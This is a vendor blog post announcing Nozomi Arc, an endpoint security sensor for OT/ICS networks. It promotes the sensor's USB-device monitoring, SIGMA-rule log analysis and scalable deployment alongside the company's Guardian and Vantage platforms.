Get More Insight into Endpoint Activity and Threats with Nozomi Arc

Get More Insight into Endpoint Activity and Threats with Nozomi Arc

We are very excited to be launching the newest member of our product portfolio, Nozomi Arc. Arc is our first endpoint security sensor that now complements your Guardian and Vantage deployments with more visibility into a host’s attack surfaces and anomalies, to give a more detailed view of your complete OT/ICS environment. It improves operational resiliency by significantly extending visibility across endpoint attack surfaces, dramatically reducing security threats and speeding deployments across all assets and sites. Existing customers will want to give it a quick try since it’s easy to deploy and shows right up on your Nozomi dashboard. New customers will find the newly enhanced Nozomi portfolio as a more complete and highly scalable option to secure their critical infrastructure.

More Visibility, More Insight, More Security

As most Nozomi Networks fans and industry experts know, the focus of OT/ICS security started out with passive network monitoring. With a primary objective of not disrupting existing systems and processes, and protocol and bandwidth constraints in many environments, assets, vulnerabilities, and threats had to be identified from network traffic rather than more direct or proactive techniques available to the IT and data center side of the house.

As industry and technology evolved, though, customers are always looking to capture more insight and data from key resources, more frequently to get a better idea of security threats and to detect vulnerabilities and process anomalies. A few years ago, Nozomi Networks introduced Smart Polling which allowed customers to proactively poll endpoints to get more data more frequently, but which was still a network-based sensor from a Guardian engine. Customers often had use cases and deployment scenarios where even greater endpoint analysis was required, with more continuous monitoring than Smart Polling alone could provide.

Nozomi Arc fills that gap with a sensor that runs directly on the endpoint, giving us access to more of the attack surface, more frequently than possible before. Why would it make sense to turn any or all of your endpoints into a security sensor as well?

Why Add Nozomi Arc?

First of all, we can detect more threats, malicious or compromised hosts, and even insider threats than with a network sensor alone. For example, Nozomi Arc lets you monitor all the attached USB devices to the host. We can identify when a device is attached that reports to being a memory stick but really logs keystrokes. We can identify malware that might be injected from the USB device either knowingly or unknowingly by the user. None of this would be possible if you were waiting for that host to send traffic to your network sensor to identify any security threat.

Other endpoint attack surfaces that Nozomi Arc can monitor and analyze include the host log files using SIGMA rules. Nozomi Arc can search for event patterns in the log files that could be indicative of a threat or attack. SIGMA rules (tutorial here) are a standard mark-up language for threat detection that can be shared across communities and is vendor/platform agnostic. The rules are written in a standard markup language (YAML) much like YARA or Snort rules. It’s a great way for customers to build their own custom queries and searches and to search for and filter anomalous events in their environment.

Continuous Monitoring at Scale

Another primary advantage of Nozomi Arc is its ability to monitor and analyze endpoint attributes and behavior when it is not putting packets out on the network (which a network-based sensor would have to rely on). The ability to continuously monitor endpoints, even those unreachable from any Guardian sensor, can help detect emerging threats earlier than possible previously. This could be extended to mobile devices that are periodically offline, or even used in transportation environments, such as when ships are not connected to their port SOCs and central data aggregation points. Arc can cover a lot of visibility gaps that Nozomi customers and prospects want to fill.

Speeding Time to Visibility

Nozomi Arc may also prove to be logistically easier to deploy than network-based sensors, allowing customers to accelerate their security projects in new sites and greenfield environments. While network-based sensors like Guardian are passive and non-intrusive, they do have to be installed off a network switch mirror or span port. In mission-critical environments, reconfiguring switches or adding span ports may not be possible until a scheduled maintenance window which may be several weeks or months out.

By installing on the endpoint, Nozomi Arc as a lightweight executable can usually be installed at any time and can start collecting data from not only the local host but neighboring devices on the subnet with our Smart Polling feature. This will allow organizations a fast path to getting asset visibility, monitoring network connections and device behavior while scheduling install of a network-based view.

Nozomi Arc was designed for some of the largest industrial enterprises in the world. Other OT/ICS security solutions are beginning to offer customers ways to get asset data from their unconnected or offline devices, but unlike Nozomi Arc, they tend to be manually installed applications that require a manual sync with the network data capture engine, and are tedious to deploy at scale. Arc sensors can be deployed through automation platforms that roll out endpoint applications at scale to hundreds of hosts, or more, as needed. Policies can determine where, when and for how long the applications are installed, how frequently they collect data and how much data to aggregate on the Guardian/Vantage platform. This gives customers the flexibility to meet requirements in their sensitive networks and operational environments.

Getting a More Comprehensive Visibility

The name of the game in OT and ICS security is a fast, low-impact path to more visibility, more frequently, with automated analytics and correlation. Nozomi Arc brings the complementary endpoint data visibility that customers never had with a purely network-based approach. It provides more insight to more types of attacks by monitoring USB connections, log files, local network traffic, user activity and more.

Nozomi Arc isn’t a replacement for traditional EDR or XDR endpoint security solutions but provides both relevant asset and threat data to the entire Nozomi platform up through either Guardian or Vantage, correlating with the network-based activity for a more complete view of security risks and remediation steps, specifically in OT and ICS environments.

Existing customers will really want to try Arc out on at least a few devices to see what it can do. Or we can schedule a demo to show you how it integrates with our Guardian and Vantage dashboards and how it can help your security and compliance processes.